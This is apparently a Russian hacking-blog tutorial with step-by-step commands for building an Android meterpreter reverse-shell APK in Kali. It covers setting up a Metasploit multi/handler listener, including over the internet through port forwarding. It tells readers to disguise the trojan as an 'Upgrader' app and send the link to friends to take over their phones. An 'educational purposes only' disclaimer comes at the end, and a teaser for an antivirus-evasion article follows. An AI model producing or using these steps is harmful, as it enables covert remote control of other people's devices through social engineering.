Привет, хакеры! Добро пожаловать на наш сайт.
В этой статье мы расскажем, как взломать Android-телефон с помощью Kali. Мы не нашли ни одного туториала по использованию этого хака/эксплоита, поэтому и решили написать его сами. Возможно, вы уже о нем знаете.

Шаг 1. Запустите Кали

  • Откройте терминал, и создайте файл Trojan.apk
  • Вы можете сделать это, набрав: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените LHOST своим собственным IP-адресом)
  • Вы также можете взломать Android через WAN, то есть через Interet, используя ваш общедоступный/внешний IP-адрес в параметре LHOST и пробросом портов (если вам не понятно, что такое «проброс портов» — напишите об этом комментарий).

Шаг 2. Откройте другой терминал

  • Пока файл генерируется, откройте другой терминал.
  • Загрузите консоль metasploit, набрав: msfconsole

Шаг 3. Установите «прослушивателя»

  • После того, как msfconsole запустится (потребуется некоторое время) загрузите multi-handler эксплоит, набрав в консоли: use exploit/multi/handler

  • Установите реверсивную полезную нагрузку, набрав: set payload android/meterpreter/reverse_tcp
  • Чтобы установить тип L-хоста: установите LHOST 192.168.0.4 (Даже если вы взламываете WAN, указывайте здесь ваш частный/внутренний IP-адрес, а не публичный/внешний).

Шаг 4. Эксплуатируйте!

  • Наконец, для запуска «прослушивателя» введите в консоли: exploit.
  • Копируйте приложение, которое вы создали (Upgrader.apk) из корневой папки на ваш Android-телефон.

  • Затем отправьте его в Dropbox или на любой файлообменник (например: www.speedyshare.com).
  • Затем отправьте ссылку, которую этот сервис вам дал, вашим друзьям и эксплуатируйте их телефоны (только в локальной сети, но если вы использовали метод WAN, то вы можете использовать этот эксплоит из любого места в Интернете)
Читать также:  Учимся Шифровать звонки

  • Пусть жертва установит приложение Upgrader (поскольку он будет думать, что он предназначен для обновления некоторых функций на его телефоне).
  • Однако в настройках безопасности Android-телефона опция разрешения на установку приложений из неизвестных источников должна быть включена, чтобы можно было установить ваш троянец.
  • И когда он нажимает «Открыть» …

Шаг 5. БУМ!

Появляется вывод meterpreter:

——- ВЗЛОМАН ——

Конец

Обязательно приходите за добавкой!
Некоторые почтовые модули, которые работают для Windows, могут не работать в android
Например: run killav, persistence (бэкдор) и т.д.

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.
Показать больше в Обучение

Оставить комментарий

Проверьте также

Как за 5 секунд обойти антивирусы с помощью одной Python-команды

Содержание:Шаг 1. Запустите сервер NetcatШаг 2. Сохраните полезную нагрузкуШаг 3. Загрузит…